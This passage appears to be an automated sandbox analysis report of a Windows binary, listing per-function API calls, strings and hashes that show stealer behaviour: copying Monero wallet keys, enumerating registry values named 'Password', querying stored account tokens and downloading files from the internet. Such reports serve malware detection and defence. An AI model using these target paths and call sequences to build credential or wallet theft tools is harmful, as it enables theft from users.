                              • Part of subcall function 000E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,000E4EEE,00000000,00000000), ref: 000E9B2A
                              • Part of subcall function 000E9AC0: LocalFree.KERNEL32(?,?,?,?,000E4EEE,00000000,?), ref: 000E9B3F
                            • lstrcat.KERNEL32(?,00000000), ref: 000F44A3
                            • StrCmpCA.SHLWAPI(?,001008D1), ref: 000F44C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 000F44D2
                            • lstrcat.KERNEL32(00000000,?), ref: 000F44E5
                            • lstrcat.KERNEL32(00000000,00100FB8), ref: 000F44F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: 5b1e0cc83caedcc0f2fe14e2444cda08556710934b4e9e9a756b005b7668afd2
                            • Instruction ID: e364367bdfb0c7aa5d7d3236cfe3676715ce445f0d0e8f172978745e9e3f7b81
                            • Opcode Fuzzy Hash: 5b1e0cc83caedcc0f2fe14e2444cda08556710934b4e9e9a756b005b7668afd2
                            • Instruction Fuzzy Hash: 057167B690061CABCB14FBA0DC85FEE777DAB48300F048598F605A7182DB74DB45DB91
                            Function 000E1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000E12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E12B4
                              • Part of subcall function 000E12A0: RtlAllocateHeap.NTDLL(00000000), ref: 000E12BB
                              • Part of subcall function 000E12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000E12D7
                              • Part of subcall function 000E12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000E12F5
                              • Part of subcall function 000E12A0: RegCloseKey.ADVAPI32(?), ref: 000E12FF
                            • lstrcat.KERNEL32(?,00000000), ref: 000E134F
                            • lstrlen.KERNEL32(?), ref: 000E135C
                            • lstrcat.KERNEL32(?,.keys), ref: 000E1377
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                              • Part of subcall function 000F8B60: GetSystemTime.KERNEL32(00100E1A,0122A2A0,001005AE,?,?,000E13F9,?,0000001A,00100E1A,00000000,?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000F8B86
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 000E1465
                              • Part of subcall function 000FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000FA7E6
                              • Part of subcall function 000E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000E99EC
                              • Part of subcall function 000E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000E9A11
                              • Part of subcall function 000E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000E9A31
                              • Part of subcall function 000E99C0: ReadFile.KERNEL32(000000FF,?,00000000,000E148F,00000000), ref: 000E9A5A
                              • Part of subcall function 000E99C0: LocalFree.KERNEL32(000E148F), ref: 000E9A90
                              • Part of subcall function 000E99C0: CloseHandle.KERNEL32(000000FF), ref: 000E9A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 000E14EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 736c9f4b3a86286ea95e187e2eab0f65e50a9d721cbf9467b0d6e888927fdcec
                            • Instruction ID: 532978fd91a795aa0e49af08aa6a6228b6bec5881429d38504ed3fd8ce4d13e4
                            • Opcode Fuzzy Hash: 736c9f4b3a86286ea95e187e2eab0f65e50a9d721cbf9467b0d6e888927fdcec
                            • Instruction Fuzzy Hash: 1B5123F1A5011D9BCB15FB60DC91BFD737CAB55300F4041A8B70E62492EF706B8ADAA6
                            Function 000E75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000E72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 000E733A
                              • Part of subcall function 000E72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000E73B1
                              • Part of subcall function 000E72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 000E740D
                              • Part of subcall function 000E72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 000E7452
                              • Part of subcall function 000E72D0: HeapFree.KERNEL32(00000000), ref: 000E7459
                            • lstrcat.KERNEL32(00000000,001017FC), ref: 000E7606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 000E7648
                            • lstrcat.KERNEL32(00000000, : ), ref: 000E765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 000E768F
                            • lstrcat.KERNEL32(00000000,00101804), ref: 000E76A0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 000E76D3
                            • lstrcat.KERNEL32(00000000,00101808), ref: 000E76ED
                            • task.LIBCPMTD ref: 000E76FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                            • String ID: :
                            • API String ID: 2677904052-3653984579
                            • Opcode ID: 5253628223a075f41e2b4631f21ea5723713e3f373f9f916a3a9fc0c204ca6cc
                            • Instruction ID: b74fbcc7b64555050da604e37ee6a7361ce34aa9f8326b09d29b6d13a38f1e42
                            • Opcode Fuzzy Hash: 5253628223a075f41e2b4631f21ea5723713e3f373f9f916a3a9fc0c204ca6cc
                            • Instruction Fuzzy Hash: 59314975A00549EFCB1AEBA5DC85DFE7778AB44302F10811CF106B7291DB38A947CB52
                            Function 000F8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0122E0C8,00000000,?,00100E2C,00000000,?,00000000), ref: 000F8130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000F8137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 000F8158
                            • __aulldiv.LIBCMT ref: 000F8172
                            • __aulldiv.LIBCMT ref: 000F8180
                            • wsprintfA.USER32 ref: 000F81AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            • Opcode ID: 0cc5479717066fe24428f806e6ce22fd544dec189c67dd9e7c0ab28c2843760d
                            • Instruction ID: 683ee0de87153efae1faa5ac13736dfe8069202aab472b65f14e5a27f58b023f
                            • Opcode Fuzzy Hash: 0cc5479717066fe24428f806e6ce22fd544dec189c67dd9e7c0ab28c2843760d
                            • Instruction Fuzzy Hash: F821F7B1A4421CABDB10DFD4CC49FAEBBB9FB44B10F104609F705AB680D77869019BA5
                            Function 000E60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000FA7E6
                              • Part of subcall function 000E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000E4839
                              • Part of subcall function 000E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000E4849
                            • InternetOpenA.WININET(00100DF7,00000001,00000000,00000000,00000000), ref: 000E610F
                            • StrCmpCA.SHLWAPI(?,0122E878), ref: 000E6147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 000E618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 000E61B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 000E61DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 000E620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 000E6249
                            • InternetCloseHandle.WININET(?), ref: 000E6253
                            • InternetCloseHandle.WININET(00000000), ref: 000E6260
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: 94125bcb60a0cd6b90d0b8dd68ed4a097e173002f8f216211df99a07f0629ed4
                            • Instruction ID: 9120f1f9aca16a7bfb88438fc7538241d279256931cfade3c33cbcee3fc1787c
                            • Opcode Fuzzy Hash: 94125bcb60a0cd6b90d0b8dd68ed4a097e173002f8f216211df99a07f0629ed4
                            • Instruction Fuzzy Hash: E9516FB1A00608AFDB20DF91EC45BEE77B8EB44741F10809CA705B71C1DBB56A8ACF95
                            Function 000E72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 000E733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000E73B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 000E740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 000E7452
                            • HeapFree.KERNEL32(00000000), ref: 000E7459
                            • task.LIBCPMTD ref: 000E7555
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuetask
                            • String ID: Password
                            • API String ID: 775622407-3434357891
                            • Opcode ID: 4a418d0584d45e0adeea5c2461cefe72dec789a0358f71fc568b551d139b1a2f
                            • Instruction ID: 9e829b3f89cd0f2b465b1a4ef48aa3ea0ae609087d57a4d3a8ea060ce1751201
                            • Opcode Fuzzy Hash: 4a418d0584d45e0adeea5c2461cefe72dec789a0358f71fc568b551d139b1a2f
                            • Instruction Fuzzy Hash: 1B61ECB59042589FDB24DB51DC55BD9B7B8BF44300F0081E9E68DA6181EBB05FC9CFA1
                            Function 000EBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                              • Part of subcall function 000FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000FA7E6
                            • lstrlen.KERNEL32(00000000), ref: 000EBC9F
                              • Part of subcall function 000F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000F8E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 000EBCCD
                            • lstrlen.KERNEL32(00000000), ref: 000EBDA5
                            • lstrlen.KERNEL32(00000000), ref: 000EBDB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 1606469042ea481c5603f24525ec094990e7eaccf626f5b41469f4328827bcd3
                            • Instruction ID: 28ff0b093841861c6de4008aa0a8fbac6460f0fd62043893a3a66790ec2d705c
                            • Opcode Fuzzy Hash: 1606469042ea481c5603f24525ec094990e7eaccf626f5b41469f4328827bcd3
                            • Instruction Fuzzy Hash: 05B147B1A1010CABDB14FBA0DC56EFE737CAF55300F404168F60A76492EF746A4ADB62
                            Function 000F6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: 76b31fcd30d92944373113d970975d44bdfb94829dbc8f45f5dacba18942c3bc
                            • Instruction ID: c3e838e11fff9850046811b79cc6a6a6b2f154b91392eaf7a2508945fadce6b0
                            • Opcode Fuzzy Hash: 76b31fcd30d92944373113d970975d44bdfb94829dbc8f45f5dacba18942c3bc
                            • Instruction Fuzzy Hash: 61F05E30908209EFD355AFE4E90976CBBB8FB14703F04019CE619C6690D6754B42DB9A
                            Function 000E4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000E4FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E4FD1
                            • InternetOpenA.WININET(00100DDF,00000000,00000000,00000000,00000000), ref: 000E4FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 000E5011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 000E5041
                            • InternetCloseHandle.WININET(?), ref: 000E50B9
                            • InternetCloseHandle.WININET(?), ref: 000E50C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
